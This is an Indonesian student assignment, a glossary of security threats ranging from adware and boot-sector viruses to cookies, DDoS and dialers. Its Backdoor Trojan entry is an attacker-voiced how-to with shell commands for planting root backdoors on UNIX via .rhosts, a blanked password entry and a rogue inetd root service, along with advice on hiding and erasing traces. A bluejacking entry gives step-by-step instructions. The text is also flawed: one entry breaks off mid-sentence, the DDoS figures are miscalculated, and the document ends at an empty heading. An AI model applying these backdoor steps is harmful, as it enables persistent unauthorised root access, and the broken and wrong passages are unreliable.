Tugas Keamanan Komputer

86
NAMA KELOMPOK : - NURHABIBAH BR SIREGAR (09071003005) - DEA CITRA ARAMINTA (09071003007) - ERNISAPUTRI (09071003009) SISTEM INFORMASI 5A Adware Adware adalah iklan yang dimasukan secara tersembunyi oleh pembuatprogram. Umumnya program diberikan secara gratis, tetapi dengan kompensasi pemakai harus menerima iklan pada program. Backdoor Trojan Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat belakang'. Backdoor berfungsi untuk memberikan sang programmer akses ke suatu sistem, tanpa sepengetahuan user lain ataupun sang sysadmin. Tentu saja sang programer di sini bisa juga diartikan 'sang penyusup'. Seringkali backdoor memberikan akses tak terbatas kepada siapapun juga yang mengetahui jalan masuknya. Walaupun tidak jarang vendor-vendor besar (baik hardware maupun software ) yang sengaja menempatkan backdoor tak terdokumentasi untuk kemudahan 'maintenance' dan sejenisnya, dalam artikel ini yang dimaksud adalah backdoor dalam artian memberikan akses root ke dalam sebuah sistem UNIX sebagai antisipasi jika sang sysadmin kebetulan menyadari bahwa ada penyerang di dalam sistem. Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan berhasil masuk ke sebuah sistem dengan memanfaatkan login user dan segera menjalankan eksploit-eksploit lokal untuk mengambil alih kekuasaan root. Tentunya sayang jika saat sang

Transcript of Tugas Keamanan Komputer

NAMA KELOMPOK :

- NURHABIBAH BR SIREGAR (09071003005)

- DEA CITRA ARAMINTA (09071003007)

- ERNISAPUTRI (09071003009)

SISTEM INFORMASI 5A

Adware

Adware adalah iklan yang dimasukan secara tersembunyi oleh pembuatprogram. Umumnya program

diberikan secara gratis, tetapi dengan kompensasi pemakai harus menerima iklan pada program.

Backdoor Trojan

Seperti terjemahan harfiahnya, backdoor bisa dianggap 'pintu masuk lewat belakang'.

Backdoor berfungsi untuk memberikan sang programmer akses ke suatu sistem, tanpa

sepengetahuan user lain ataupun sang sysadmin. Tentu saja sang programer di sini bisa juga

diartikan 'sang penyusup'. Seringkali backdoor memberikan akses tak terbatas kepada siapapun juga

yang mengetahui jalan masuknya. Walaupun tidak jarang vendor-vendor besar (baik hardware

maupun software ) yang sengaja menempatkan backdoor tak terdokumentasi untuk kemudahan

'maintenance' dan sejenisnya, dalam artikel ini yang dimaksud adalah backdoor dalam artian

memberikan akses root ke dalam sebuah sistem UNIX sebagai antisipasi jika sang sysadmin

kebetulan menyadari bahwa ada penyerang di dalam sistem.

Kamu sudah semalaman begadang, mencoba eksploit-eksploit remote, dan berhasil masuk

ke sebuah sistem dengan memanfaatkan login user dan segera menjalankan eksploit-eksploit lokal

untuk mengambil alih kekuasaan root. Tentunya sayang jika saat sang sysadmin kembali bekerja di

keesokan harinya, akses kamu ditutup. Nah, disinilah manfaatnya kita menanam satu atau lebih jalan

masuk 'alternatif'. Jelas, sebagian besar teknik-teknik backdooring hanya bisa diterapkan jika kamu

mempunyai perizinan root.

Ingat, bahwa tujuan membuat backdoor bukanlah untuk mendapatkan akses root, tetapi

untuk mendapatkan akses root LAGI setelah sang sysadmin menutup segala jalan masuk normal.

Terkadang sysadmin sering menganggap selama file-file /etc/hosts.deny telah dikonfigurasi, maka

segala koneksi dari host kamu akan ditolak. Tentu saja kalian-kalian, sang cracker, kelihaian kung fu

nya jauh di atas sang sysadmin, sebab tanpa sepengetahuan beliau, telah kamu set up beberapa

jalan masuk alternatif dengan privilese root.

Nah, backdoor backdoor ini ada yang memang sudah dari sononya (seperti Backdoor di router-

router, printserver, dll buatan 3Com), namun disini akan kami jelaskan cara membuat backdoor

kamu sendiri di sebuah sistem UNIX. Jalan termudah (dan yang paling gampang ditangkap) adalah

dengan melalui file /.rhosts:

korban# echo "indohack2.ri.go.id ganjaman" >> /.rhosts

perintah diatas akan menambah satu entri di file .rhosts (sistem luar-dalam contoh diatas user

ganjaman dari indohack2.ri.go.id - yang bolehmengakses account tanpa password), dan untuk masuk

kembali ke sistem dari account "ganjaman" di indohack2.ri.go.id :

ganjaman@indohack2> rlogin -l root korban.lameisp.net.id poof! shell root tanpa password!

Untuk kalian yang ingin sedikit lebih tersembunyi lagi, coba perhatikan entri berikut dari file

/etc/passwd sebuah sistem:

bin:*:3:7:Binaries Command and Source,,,:/bin:/bin/false

tentunya bagi mereka yang sering memanen password entri seperti di atas sudah tidak asing lagi.

Account diatas adalah account yang digunakan oleh UNIX sistem secara internal. Seringkali banyak

diantara crackers yang mengambil jalan singkat dan menghapus karakter *, mengakibatkan telnet

dengan nama login "bin" tidak memerlukan password. Tapi ingatlah bahwa file /etc/passwd biasanya

adalah file pertama yang akan diperiksa oleh sang sysadmin saat dia menyadari bahwa sistemnya

telah kena susup. Agar kita lebih sulit dideteksi, maka ada baiknya kita buat file .rhosts di home

directory milik bin. Kembali ke entri file password diatas, bisa kita lihat bahwa walaupun kita bisa

me- rlogin -l bin korban.lameisp.net.id, namun kita masih juga tidak bisa mendapatkan shell sebab

account 'bin' dikonfigurasikan untuk menolak penggunaan shell. Cara mengatasi masalah ini

tentunya dengan membuat link dari /bin/false ke /bin/sh atau /bin/tcsh. Apa daya seorang

sysadmin? Tentunya jika mereka memang keren kung fu nya, sang sysadmin akan mensetup sebuah

skrip yang memeriksa keberadaan file-file .rhosts di dalam sebuah sistem. Tak lupa merubah entri

dari account-account internal dari /bin/false ke /nggak-ada-tuh atau string unik lainnya yang bukan

merupakan nama file.

Metode backdooring lain adalah dengan memanfaatkan "in.rootd" (sebenernya ini hanyalah

rekayasa saja, sebab sepanjang pengetahuan kami, nggak ada tuh yang namanya root daemon - tapi

metode ini benar-benar cocok disebut rootd) yang pada dasarnya bertugas untuk membuat sebuah

lubang masuk lewat salah satu port yang didefinisikan dalam "inetd":

root@korban# echo "ntcp 6969/tcp # Network Traffic Control Protocol" >> /etc/services

root@korban# echo "ntcp stream tcp nowait root /bin/sh sh /tmp/crax0r" >> /etc/inetd.conf

root@korban# echo "echo indohack2.ri.go.id > ~root/.rhosts" > /tmp/crax0r menjalankan tiga

perintah diatas bisa mengakibatkan kompromisasi sistem yang cukup dahsyat, namun tidak akan

segera tampak. Penjelasan dari ketiga perintah diatas:

1. Mengaktifkan protokol ntcp di port 6969 (tentunya kamu memilih nomor port lain yang tidak

begitu mencurigakan, silakan pilih mulai dari 1024 sampai 65000-an), sedangkan "Network Traffic

Control Protocol" adalah karangan kamu sendiri sebab setiap service harus punya nama, dan

biasanya sysadmin tidak akan begitu curiga dengan nama seperti itu.

2. Memerintahkan sistem untuk menjalankan perintah /bin/sh sh /tmp/crax0r setiapkali sang sistem

menerima koneksi telnet lewat port 6969. Sayangnya mengeksekusi sebuah shell berprivilese

root lewat cara ini hanya akan mengakibatkan sang sistem bengong, sebab kita tidak bisa

memberikan perintah-perintah selayaknya kita login lewat jalur normal. Sang shell akan tetap

dijalankan, namun tidak akan bisa mengeksekusi perintah kita. Untuk itulah kita buat satu skrip di

direktori /tmp/crax0r (tentunya kamu lebih pintar dan memilih nama yang tidak begitu

mencurigakan seperti /tmp/dev001).

3. Nah, perintah ketiga ini lah yang akan dieksekusi oleh sang shell yang baru saja kita luncurkan

(id=0 - root!). Tentunya kamu bisa saja menulis skrip yang lebih kompleks. Namun untuk

menghemat tempat, kita lancarkan saja perintah yang sudah dibahas diatas, yaitu menambahkan

entri dari mesin host kita ke file .rhosts milik root.

Tentu jika sang admin memang keren kung funya, rlogind akan dikonfigurasikan untuk tidak

mengindahkan file .rhosts, namun jika kamu periksa isi direktori dan file "history" milik root dan

isinya menunjukkan bahwa sang sysadmin tidak begitu melek soal keamanan, maka metode diatas

akan memberikan jalan masuk lewat belakang ke dalam sistem target. Sekarang kamu tinggal:

ganjaman@indohack2> telnet korban.lameisp.net.id 6969

Sistem kamu akan tersambung ke sistem target lewat port 6969, sedangkan daemon inet di

mesin korban akan menerima sambungan tersebut, menjalankan perintah dalam skrip /tmp/crax0r

dengan privilese root, dan dengan segera menutup kembali sambungan telnet. Sekarang .rhosts

milik root sudah ditambahi satu entri lagi, yaitu nama host kamu. Untuk kembali menggarap sistem

target (sebaiknya dilakukan saat itu juga, sebab sang sysadmin mungkin akan curiga melihat skrip

'asing' dijalankan lewat port 6969) kamu tinggal: ganjaman@indohack2> rlogin -l root

korban.lameisp.net.id dan, BOOM! korban#

Shell root tanpa password! (Nah, sekarang kamu boleh kirim surat penggemar ke

[email protected], bertitel "Terimakasih, suhu Ganjaman dan SuperCock, atas ilmu ngent...

engin badannya ..." :) ). Tapi ingatlah untuk segera menghapus file .rhosts dan jejak jejak lain.

Tentunya kalau kung fu kamu emang udah cukup tinggi, teknik menyembunyikan diri dan antideteksi

udah bukan barang asing bagi kamu, jadi, jangan lupa aktifkan segala spoofer program, dll. Kalau

kamu benar-benar suka mengutak-utik, serangan bisa dibuat dengan lebih tersembunyi lagi, seperti

dengan memanfaatkan service-service yang jarang (hampir tidak pernah dipakai) seperti utilitas-

utilitas X, segala utilitas berkepala "r", dan banyak lagi.

Metode lain yang cukup populer adalah dengan membuat sebuah file dengan bit SUID

tambahan, namun cara ini gampang terdeteksi jika kebetulan sistem mempunyai program audit

keamanan yang akan mensensus seluruh file berbit SUID yang terletak diluar lokasi-lokasi wajar

(seperti /tmp atau lokasi homedir user). Ide yang lebih mantap lagi adalah dengan memodifikasi

suatu program yang sudah berjalan / terinstal secara default, seperti xterm dan splitvt, sehingga

sebuah option rootshell akan secara otomatis execv("/bin/sh", "sh", NULL);.

Bluejacking

Sebelum saya berbicara lebih jauh tentang bluejacking, kita harus mengatahui dulu, apa itu

bluetooth. Saat ini banyak peralatan yang dilengkapi fasilitas bluetooth, dimana fasilitas ini

memungkinkan sebuah perangkat (ponsel, PDA, printer, kamera digital, komputer, handsfree,

mouse, keyboard, modem dll.) dapat saling berhubungan dengan perangkat bluetooth lainnya tanpa

menggunakan kabel yang secara teori dapat bekerja dalam jarak ± 10 meter.

Dalam sebuah ponsel atau PDA, fungsi bluetooth biasanya digunakan untuk berkirim nomor telepon,

gambar, daftar kegiatan atau kalender, agar dapat saling bertukar data dengan perangkat bluetooth

lainnya, kedua perangkat tersebut harus melakukan pairing terlebih dahulu, pairing adalah sebuah

proses dimana ada salah satu perangkat yang bertindak sebagai 'pencari'(discover) dan perangkat

lainnya yang menjadi 'yang dicari' (discoverable). Setelah melakukan pairing tersebut barulah kedua

perangkat tadi dapat saling bertukar data.

Pada tindakan bluejacking untuk mengirimkan data kita tidak melalui tahap pairing sehingga

korbannya tidak mengetahui bahwa ponselnya sedang disusupi oleh seseorang (pelaku bluejacking

biasanya disebut bluejacker sedangkan korbannya disebut victim), seorang bluejacker dapat

mengirimkan pesan atau gambar kepada perangkat korban secara tiba-tiba, sehingga pesan atau

gambar nyelonong ke perangkat korban tanpa permisi, biasanya korban bluejacking kaget atau

bahkan resah jika isi pesan atau gambar yang diterimanya bersifat teror.

Namun sejauh ini secara teknis tindakan bluejacking tidak terlalu berbahaya baik terhadap perangkat

maupun program aplikasi yang terdapat dalam ponsel atau PDA, hanya saja si korban akan merasa

terganggu dengan datangnya pesan secara tiba-tiba, si penerima pesan biasanya tidak dapat

melacak dari mana pesan itu datang, sebab dalam hal ini perangkat bluetooth sama sekali tidak

mengakses simcard hanya menggunakan gelombang pendek yang dimiliki oleh perangkat bluetooth,

sehingga nomor si pengirim tidak dapat diketahui. Adapun ponsel yang rentan terhadap tindakan

bluejacking ini adalah Sony Ericsson's T68, R520m, T68i, T610, Z1010, Z600 dan Nokia's 6310, 6310i,

3650, 7650, 8910 dan 8910i.

Bagaimana melakukan Bluejacking?

Untuk dapat melakukan bluejacking kita tidak membutuhkan pengetahuan dan kemampuan sekelas

programer atau hacker, yang kita butuhkan hanyalah sebuah perangkat yang memiliki fasilitas

bluetooth. Berikut ini adalah langkah-langkah yang dapat kita lakukan untuk melakukan bluejacking;

1. Bawalah perangkat bluetooth yang ada (Ponsel, PDA, PocketPC), dalam hal ini saya

mengasumsikan bahwa kita menggunakan ponsel.

2. Buatlah daftar kontak baru pada phonebook dengan diisi pesan yang akan kita kirim pada

seseorang, misalnya pada kolom First Name diisi kalimat "Selamat Datang di" sedangkan pada kolom

Last Name diisi kalimat "Dunia Digital", simpanlah pesan tersebut sebagai daftar kontak yang baru.

Jika mau kita bisa membuat kalimat lain sebanyak mungkin.

3. Pergilah ketempat ramai, atau tempat yang memungkinkan banyak orang membawa ponsel

seperti Mall, Lobby, Restoran, Toko Ponsel dll.

4. Bukalah daftar kontak yang berisi pesan yang telah kita buat tadi, lalu pilih menu "Send Via

Bluetooth"

5. Sesaat ponsel akan mencari perangkat bluetooth lain yang ada disekitar kita, jika tidak

menemukan perangkat lain, pindahlah ketempat yang lebih ramai.

6. Jika ponsel menemukan perangakt bluetooth lain, maka akan muncul di layar ponsel kita, biasanya

nama perangkat lain akan muncul sebagai merek ponsel yang bersangkutan tapi ada juga yang sudah

dirubah oleh pemiliknya sebagai nama lain.

7. Jika perangkat yang ditemukan lebih dari satu, pilihlah salah satunya.

8. Jika berhasil maka daftar kontak yang berisi kalimat tadi akan terkirim pada perangkat tersebut.

9. Jika memungkinkan, lihatlah orang lain disekitar kita yang membawa perangkat bluetooth, kita

juga harus dapat membedakan ponsel mana yang memiliki fasilitas bluetooth dan yang tidak.

10. Selanjutnya, terserah kita.

Sebenarnya ada tindakan penyusupan lain yang lebih mengerikan adalah apa yang disebut dengan

bluesnarfing atau sering juga disebut dengan snarf attack, dengan metode yang hampir sama dengan

bluejacking pelaku snarf attack dapat mengcopy semua data yang ada didalam ponsel korban seperti

daftar kontak, kalender dan pesan yang ada dalam ponsel korban. Untuk melakukan bluesnarfing

diperlukan laptop/PC yang didalamnya sudah terinstal aplikasi bluesnarfing namun sampai tulisan ini

diturunkan belum ada satu pihakpun yang menyediakan aplikasi ini, baik di Internet maupun di

pasaran selain aplikasi yang dimiliki salah satu peserta pameran CeBIT2004 di Hannover Jerman pada

waktu lalu, mereka menggunakan aplikasi Bluez yang didalamnya terdiri dari aplikasi bluez-libs-

2-.5,bluez-utils-2.4 and bluez-sdp-1.5 program tersebut dibuat dalam bahasa C dan PERL yang

berjalan dibawah kernel Linux versi 2-6-2., lalu diinstalkan pada laptop COMPAQ Evo N600c

ditambah dua buah peralatan bluetooth dongle-USB yang terpasang pada laptop tersebut.

Sampai saat ini kita memang belum pernah mendengar korban dari tindakan Bluesnarfing ini, namun

tindakan percobaan yang pernah dilakukan oleh perusahaan yang bernama Salzburg Research

Forschungsgesellschaft mbH dari Austria yang menempati stand hall 11 pada pameran CeBIT 2004 di

Jerman sempat menghebohkan para pengunjung pameran tersebut karena hasilnya sungguh

mengejutkan bahwa ponsel dan PDA yang selama ini mereka gunakan untuk menyimpan data

penting dan rahasia dapat diakses dengan mudah oleh orang lain.

Pencegahan dari Tindakan Bluejacking dan Bluesnarfing:

Untuk mencegah agar perangkat bluetooth yang kita miliki agar tidak terkena tindakan

bluejacking/bluesnarffing sebenarnya sangatlah sederhana, kuncinya adalah matikanlah fasilitas

bluetooth yang ada pada ponsel kita jika berada ditempat umum atau jika memang fasilitas ini tidak

digunakan. Tindakan lain yang lebih aman adalah dengan cara meng-upgrade firmware yang ada

dalam ponsel kita dengan versi yang lebih baru.

Sebenarnya tindakan bluejacking ini dapat juga digunakan untuk hal-hal yang lebih positif, walaupun

memang sedikit bersifat spamming, misalnya penawaran diskon suatu barang ketika seseorang yang

memiliki perangkat bluetooth sedang melihat-lihat didepan toko yang menjual barang diskon

tersebut, atau ucapan "selamat datang" ketika seseorang masuk kewilayah tertentu, misalnya.[Q]

Bluesnarfing

Snarf attack memungkinkan kita terhubung dengan ponsel Bluetooth tanpa ada peringatan

kepada pemiliknya bahwa bahwa ponsel mereka sedang diintip oleh orang lain. Dengan metode ini,

para hacker dapat mengakses data-data ponsel, termasuk di dalamnya phonebook, image, calendar,

realtime clock, bussines card, properties bahkan nomor IMEI. Normalnya, hat ini mungkin dilakukan

jika ponsel target dalam mode ‘discoverable’ atau ‘visible’, akan tetapi dengan aplikasi semacam

Boot Sector Viruses

Virus Boot sector ini sudah umum sekali menyebar (terus terang hardiskku sering diformat gara

gara virus ini. Virus ini dalam menggandakan dirinya akan memindahkan atau menggantikan boot

sector asli dengan program booting virus. Sehingga saat terjadi booting maka virus akan di load

kememori dan selanjutnya virus akan mempunyai kemampuan mengendalikan hardware

standar(ex::monitor, printer dsb) dan dari memori ini pula virus akan menyebar keseluruh drive

yang ada dan terhubung kekomputer (ex: floopy, drive lain selain c:\)

contoh virus ::

- varian virus wyx (langganan gwa nih :) ex: wyx.C(B) menginfeksi boot record dan floopy ;

panjang :520 bytes; karakteristik : memory resident dan terenkripsi)

- varian V-sign : menginfeksi : Master boot record ; panjang 520 bytes; karakteristik:

menetap di memori (memory resident),terenkripsi, dan polymorphic)

- Stoned.june 4th/ bloody!: menginfeksi : Master boot record dan floopy; panjang 520 bytes;

karakteristik: menetap di memori (memory resident), terenkripsi dan menampilkan pesan

"Bloody!june 4th 1989" setelah komputer melakukan booting sebanyak 128 kali.

Browser Hijackers

Browser anda dimasukan link tertentu. Dan memaksa anda masuk padasebuah situs walaupun anda sudah benar mengetik alamat situs yang anda inginkan. Artinya, program Browser anda secara tidak langsung sudah dibajak dan diarahkan ke situs tertentu.

Kategori untuk Trojan, Worm dan HijackerTrojan adalah replika atau duplikat virus. Trojan dimasukan sebagai virus karena sifat program yang tidak diinginkan dan bekerja dengan sendirinya pada sebuah komputer. Sifat trojan adalah mengkontrol komputer secara otomatis. Misalnya komputer yang dimasuki trojan email. Trojan dimasukan dalam RATS (remote access trojans) dimana sebuah komputer dikontrol oleh program tertentu, bahkan beberapa trojan difungsikan membuka komputer agar dapat dimasuki oleh komputer dan diakes dari jauh. Worm adalah virus. Kategori Worm dikelompokkan sebagai si cacing internet. Fungsi utamanya untuk melakukan serangan dan menyebar serta mengambil data dan mengirim email secara diam-diam dan acak. Tetapi saat ini juga dimanfaatkan untuk tujuan tertentu, misalnya mengirim data pada sebuah komputer tanpa diketahui oleh pemiliknya. Batasan Worm untuk tujuan komersil atau non komersial menjadi tipis. Karena program dibuat untuk mengambil data dan dikirim ke tempat tertentu. Untuk Hijacker dimana seseorang masuk ke sebuah situs, dan secara tidak sengaja mengklik sesuai permintaan pada tampilan situs. Disitulah program Hijacker bekerja, dan memasuki fungsi browser anda agar dikontrol sesuai keinginan mereka.

Adware

Adware sebenarnya difungsikan sebagai promosi atau iklan berbentuk banner. Terkadang pemakai ingin mengunakan program shareware tetapi didalamnya terdapat program yang difungsikan sebagai Adware. Misalnya Program A yang diberikan secara gratis, ternyata memiliki jendela kecil pada program dan terus berganti ganti gambar iklan. Atau anda menggunakan Yahoo messenger dan pemilik Yahoo menempatkan banner iklan pada sebuah bagian di program Yahoo chat. Kategori diatas masih dikatakan aman, pembuat program memberikan program gratis, sementara mendapatkan dana uang dari iklan yang ditempatkan pada programnya. Sayangnya program Adware mulai dimanfaatkan terlalu banyak. Terkadang mengambil bandwidth atau beban koneksi internet terlalu besar dan akhirnya membuat koneksi internet menjadi benar-benar lambat dan mengganggu komputer ketika melakukan surfing. Terlebih adware yang sudah masuk ke dalam komputer dan menjangkit didalam program Windows. Ketika seseorang membuka sebuah situs maka yang muncul adalah link ke situs yang ditentukan oleh program Adware. Hal paling menjengkelkan bila jenis Adware yang tidak dapat ditutup. Begitu satu pop iklan muncul ditutup, tidak lama lagi muncul pop iklan baru yang lebih banyak. Bahkan Adware dapat melakukan pekerjaan ganda yang dibutuhkan pada tampilan sebuah iklan atau si pembuat program memanfaatkan dengan merekam data pengguna internet. Misalnya mencari tahu kemana saja seorang pemakai komputer melakukan surfing di internet atau ingin mengetahui apakah pengguna internet juga mengunjungi pihak perusahaan pesaing yang sama. Artinya dengan adanya Adware, Privasi seseorang mulai dapat

dilihat oleh orang lain. Adware tidak hanya mengganggu privasi seseorang, tetapi mencuri bandwidth internet anda secara diam diam.

Chain Letters

Surat berantai, yaitu surat yang dikirimkan kepada seseorang untuk dikirim lagi ke penerima

yang lain. Surat berantai sebagian besar berisi berita-berita yang tidak dapat dipertanggungjawabkan

isinya.

Cookies

Informasi kecil yang dikirimkan melalui browser untuk disimpan di komputer peselancar

halaman web. Data ini dapat dibuat saling berinteraksi antara server dengan komputer peselancar

halaman web tersebut. Cookie ini bisa dimanfaatkan misalnya untuk mengetahui berapa kali

komputer tersebut telah memasuki suatu halaman web, mencatat sesuatu yang diperlukan server di

komputer peselancar, maupun untuk aktifitas lainnya.

Cookies merupakan data file yang ditulis ke dalam hard disk komputer oleh web server yang digunakan untuk mengidentifikasikan diri user pada situs tersebut sehingga sewaktu user kembali mengunjugi situs tersebut, situs itu akan dapat mengenalinya.

Fugsi cookies :

1. Membantu web site untuk "mengingat" siapa kita dan mengatur preferences yang sesuai

sehingga apabila user kembali mengunjungi web site tersebut akan langsung dikenali.

2. Menghilangkan kebutuhan untuk me-register ulang di web site tersebut saat mengakses lagi

tersebut (site tertentu saja), cookies membantu proses login user ke dalam web server

tersebut.

3. Memungkinkan web site untuk menelusuri pola web surfing user dan mengetahui situs favorit

yang sering dikunjunginya.

Jenis Cookies

1. Non persistent (session) cookies. Suatu cookie yang akan hilang sewaktu user menutup browser

dan biasanya digunakan pada 'shopping carts' di toko belanja online untuk menelusuri item-

item yang dibeli,

2. Persistent cookies. Diatur oleh situs-situs portal, banner / media iklan situs dan lainnya yang

ingin tahu ketika user kembali mengunjungi site mereka. (misal dengan cara memberikan opsi

”Remember Me” saat login). File file ini tersimpan di hardisk user.

Kedua tipe cookies ini menyimpan informasi mengenai URL atau domain name dari situs yang

dikunjungi user dan beberapa kode yang mengindikasikan halaman apa saja yang sudah dikunjungi.

Cookies dapat berisi informasi pribadi user, seperti nama dan alamat email, Akan tetapi dapat juga

user memberikan informasi ke website tersebut melalui proses registrasi. Dengan kata lain, cookies

tidak akan dapat "mencuri" nama dan alamat email kecuali diberikan oleh user. Namun demikian,

ada kode tertentu (malicious code) yang dibuat misalnya dengan ActiveX control, yang dapat

mengambil informasi dari PC tanpa sepengetahuan user.

Cookies umumnya kurang dari 100 bytes sehingga tidak akan mempengaruhi kecepatan

browsing. tetapi karena umumnya browser diatur secara default untuk menerima cookies maka user

tidak akan tahu bahwa cookies sudah ada di komputer. Cookies dapat berguna terutama pada situs

yang memerlukan registrasi, sehingga setiap kali mengunjungi situs tersebut, cookies akan me-login-

kan user tanpa harus memasukkan user name dan password lagi.

Denial Of Service Attack

Disingkat dengan DoS. Adalah serangan (attack) yang diluncurkan untuk meniadakan servis (serangan terhadap availability). Serangan DoS dilakukan dengan menghabiskan resources dari target, seperti menghabiskan bandwidth (dengan membanjiri jaringan dengan beberapa paket yang banyak dan tidak karuan), memori (membuat server bingung), dan disk.

Banyak software di Internet yang dapat dikategorikan melakukan DoS attack, seperti misalnya:1. ping-of-death2. winnuke

Serangan DoS ini dapat dilakukan secara serempak dari beberapa komputer yang tersebar sehingga

disebut Distributed DoS (DDoS). Serangan ini cukup ampuh dan sempat membuat down beberapa

web site yang terkenal seperti Yahoo.com, ebay, CNN, dan lain-lainnya. Software yang digunakan

untuk menyerang diduga adalah trinoo, tfn (tribal flood network).

Serangan DDOS ( Denial Distribute of services ) Attack, mungkin adalah serangan yang paling simple di lakukan namun efeknya sangat berbahaya.Situs-situs besar seperti yahoo.com , ebay.com , hotmail.com, e-gold.com , 2checkout.com dan lain-lain pernah mengalami serangan yang mengakibatkan situs nya tidak bisa di akses selama beberapa jam.

Yang terbaru adalah situs e-gold.com pada tahun 2005 kemarin, situs nya di serang dengan memakai metode DDOS ( Denial Distribute of services ).

Bagaimana cara kerja DDOS ?

Jika Anda memakai program windows , coba lakukan ini di komputer Anda.

1. Start , Programs , Accessories , Command Prompt2. Kemudian di Command prompt ketikan , Ping -t www.situsyangdituju.com

atau bisa juga Start, Run , Ping -t www.situsyangdituju.com

Kemudian komputer Anda akan mengirimkan paket informasi ke situs yang di tuju tadi, pada dasarnya dengan perintah tersebut komputer Anda mengirimkan ucapan "Halo , apa ada orang di situ ? " , ke situs yang di tuju tadi. kemudian server situs yang di tuju tadi mengirimkan jawaban balik dengan mengatakan : "ya, di sini ada orang"

Sekarang bayangkan, jika ada ribuan komputer, dalam waktu bersamaan melakukan perintah tersebut di situs yang di tuju. 1 komputer mengirimkan data sebesar 32 bytes / detik ke situs yang di tuju. Jika ada 10.000 komputer yang melakukan perintah tersebut secara bersamaan, itu artinya ada kiriman data sebesar 312 Mega Bytes/ detik yang di terima oleh situs yang di tuju tadi.

Dan server dari situs yang di tuju tadi pun harus merespon kiriman yang di kirim dari 10.000 komputer secara bersamaan. Jika 312 MB/ detik data yang harus di proses oleh server, dalam 1 menit saja, server harus memproses kiriman data sebesar 312 MB x 60 detik = 18720 MB. Bisa di tebak, situs yang di serang dengan metode ini akan mengalami Over Load / kelebihan data, dan tidak sanggup memproses kiriman data yang datang.

Pertanyaan nya , bagaimana 10.000 komputer tersebut bisa ikut melakukan serangan ?

Komputer-komputer lain yang ikut melakukan serangan tersebut di sebut komputer zombie, dimana sudah terinfeksi semacam adware. jadi si Penyerang hanya memerintahkan komputer utamanya untuk mengirimkan perintah ke komputer zombie yang sudah terinfeksi agar melakukan Ping ke situs yang di tuju. Oleh karena itu pentingnya ada firewall di komputer anda, untuk memonitor paket yang keluar maupun yang masuk dari komputer anda.

Jika anda belum memiliki firewall bisa coba zone alarm, silahkan download di zonelabs.com Adware biasanya di dapat dari program-program gratisan yang anda download, untuk itu juga harus berhati-hati mendownload program gratisan.

Bagaimana jika ada situs yang mengklaim situsnya sedang di serang , bagaimana kita tahu itu benar atau bohong ?

Bisa kita lakukan analisa untuk mendeteksi benar atau tidaknya serangan tersebut terjadi, atau hanya mengaku-ngaku saja.

Jika anda berkecimpung di dunia Investment semacam HYIP, autosurf , atau pun situs investasi lainnya.biasanya sering anda jumpai ada situs yang adminnya bilang situsnya sedang di serang pakai metode DDOS, dan terpaksa harus menutup situs nya, ujung-ujungnya yah admin tersebut melakukan SCAM, atau tidak membayar membernya.

Berikut tahap-tahap melakukan analisa benar atau tidaknya situs tsb di serang.

1. Beri Nilai kemampuan finansial dari situs investasi tersebut.

- Sekarang ini sudah banyak jasa penyedia ANTI DDOS , biaya nya pun cukup mahal yakni berkisar $600 / bulan sampai dengan $1000 / bulan.

sekarang anda nilai situs tersebut, apakah mampu membayar jasa tersebut atau tidak. Jika bisnis nya bernilai ratusan ribu dollar , masak sih tidak mau ngeluarin uang $600 / bulan untuk mengamankan situs nya ? Sering anda lihat kan , ada situs investasi yang menulis :

Total investasi : sekian ratus ribu dollarTotal Withdrawal : sekian ratus ribu dollar

Jika benar uangnya sebanyak itu, tentu tidak ragu untuk membayar services ANTI DDOS sebesar $600 / bulan.

2. Periksa kebenaran.

Jika situs tersebut mengklaim mereka memiliki dan menyewa services ANTI DDOS, tanyakan di mana mereka menyewanya . biasanya di situs penyedia layanan ANTI DDOS di tulis nama-nama client yang menggunakan atau memakai services mereka.

3. Periksa hostingnya, apakah menggunakan satu private IP address, atau shared IP address.

Private IP address artinya = 1 nomor IP untuk 1 domainShared IP address artinya = 1 nomor IP untuk BANYAK DOMAIN.

sebagai contoh : situs semuabisnis.com menggunakan shared IP address. IP untuk domain semuabisnis.com adalah http://75.126.30.10/ dan ada sekitar 14 domain / situs yang menggunakan IP ini , salah satunya

adalah ambri-servers.com

Jadi jika situs semuabisnis.com di serang, maka efeknya akan terasa juga di ambri-servers.com maupun di situs-situs lainnya yang memiliki IP yang sama dengan semuabisnis.com .

Jika semuabisnis.com mengaku di serang, namun anda masih bisa mengakses ambri-servers.com ataupun masih bisa mengakses situs lainnya yang memiliki IP yang sama dengan semuabisnis.com , maka itu tidak benar paling cuma buat gaya-gayaan.. hehehe.

Begitu juga dengan situs investasi yang mengaku situs nya di serang, coba periksa ip addressnya. menggunakan private IP atau shared IP. jika shared IP, coba periksa situs lainnya yang memiliki IPyang sama dengan situs investasi tersebut. apakah situs lainnya masih bisa di akses atau tidak.

Jika seseorang melakukan serangan ke semuabisnis.com , maka yang tidak bisa di akses bukan hanya situs semuabisnis.com melainkan situs-situs lainnya yang memiliki IP address yang sama akan mengalami overload juga.

Untuk mengecek dia menggunakan Shared hosting atau tidak, lakukan ini.

PING -t situsyangdituju.com

kemudian catat no ip.yg muncul di command prompt.Setelah itu periksa ip tersebut di http://whois.webhosting.info/no IP jika hanya muncul satu domain, maka IP tersebut khusus untuk 1 domain ( private IP )Jika banyak nama-nama situs yang muncul, maka IP tersebut adalah 1 IP untuk banyak domain ( shared IP )

Dialers

Memasukan fungsi otomatis untuk koneksi internet, bahkan secara diam- diam program dapat aktif sendiri. Untuk kerugian, tagihan telepon anda mendadak membengkak.

Andaikata komputer yang digunakan, tidak ada hujan atau badai, berusaha menghubungkan diri ke internet padahal tak ada satu pun perangkat lunak yang dijalankan membutuhkan koneksi, maka layaklah bercuriga. Komputer kemungkinan telah terjangkit oleh malware yang terkenal dengan istilah dialer.Dialer menghubungkan computer ke internet guna mengirim kan informasi yang didapat oleh keylogger, spyware tahu malware lain ke si seseorang yang memang bertujuan demikian. Dia dan penyedia jasa teleponlah yang paling diuntungkan dengan dialer ini.

Document Viruses

